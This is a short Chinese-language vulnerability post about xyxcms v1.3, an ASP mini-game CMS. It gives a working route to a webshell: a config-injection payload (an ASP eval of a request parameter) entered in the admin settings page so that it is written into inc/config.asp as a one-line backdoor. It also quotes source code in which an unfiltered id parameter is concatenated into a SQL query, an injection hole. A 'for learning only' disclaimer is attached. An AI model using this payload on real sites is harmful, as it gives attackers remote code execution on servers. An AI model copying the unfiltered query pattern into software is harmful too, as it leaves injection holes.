xyxcms v1.3 小游戏CMS 漏洞说明
<p>国内最专业的ASP网站内容管理系统-小游戏管理系统,他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处,无论是CMS系统的易用性和功能的完善性,都处于领先优势!网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、审批、发布内容。<br /><br /> <br /> 版本信息:V1.3 正式版 <br /> 软件大小:1.66M <br /> 更新时间:2010年8月6日 <br /> 官方:http://www.xyxcms.com/ <br /> 漏洞文件: cms.asp <br /> 程序虽小。 总会遇到! <br /> 鄙视挂马者。! <br /> 学习之用。 后果自负。 <br /> 后台拿webshell: <br /> admin/admin_config.asp <br /> 网站地址: 插入 ":eval request("1"):' <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode3"> <br /> inc/config.asp 一句话后门 <br /> act=request("action") <br /> id=trim(request("id")) <br /> ................'省略 <br /> if act="getding" then call getding <br /> ....................'省略 <br /> sub getding <br /> id=request("id") '没过滤 <br /> set rs=server.createobject("adodb.recordset") <br /> sql="select ding from flash where id="&id <br /> rs.open sql,conn,1,1 <br /> if not rs.eof then <br /> if isnull(rs(0)) then <br /> response.Write(0) <br /> else <br /> response.Write(rs(0)) <br /> end if <br /> else <br /> response.Write(0) <br /> end if <br /> rs.close <br /> set rs=nothing <br /> end sub <br /></div><br /><br /></p>
頁:
[1]